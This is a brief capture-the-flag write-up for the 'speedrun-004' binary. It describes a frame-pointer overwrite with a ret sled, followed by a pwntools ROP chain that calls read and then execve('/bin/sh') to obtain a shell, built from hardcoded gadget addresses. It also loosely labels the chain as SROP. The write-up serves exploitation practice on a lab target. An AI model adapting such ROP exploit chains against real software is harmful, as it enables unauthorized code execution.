How to Solve
Frame Pointer Overwritingebp의 마지막자리 값을 \x00으로 바꾸어 buffer의 어느 부분을 가리키게 하자.- buffer의 앞부분은
ret 으로 채워 ret sled가 일어나게 하자.
Speedrun-001과 동일한 SROP 문제가 된다.
Design the Payload
read(0, address of bss, 8);
execve("/bin/sh", NULL, NULL);
Exploit
from pwn import *
p=process('./speedrun-004')
ret=0x400416
syscall=0x474f15
rax=0x415f04
rdi=0x400686
rsi=0x410a93
rdx=0x44a155
bss=0x6bbbbb
payload=""
payload+=p64(ret)*14
payload+=p64(rdi)+p64(0)
payload+=p64(rsi)+p64(bss)
payload+=p64(rdx)+p64(8)
payload+=p64(rax)+p64(0)
payload+=p64(syscall)
payload+=p64(rdi)+p64(bss)
payload+=p64(rsi)+p64(0)
payload+=p64(rdx)+p64(0)
payload+=p64(rax)+p64(59)
payload+=p64(syscall)
payload+='\x00'
p.sendlineafter('say?\n', '257')
p.sendafter('yourself?\n', payload)
p.send('/bin/sh\x00')
p.interactive()
Get The Shell
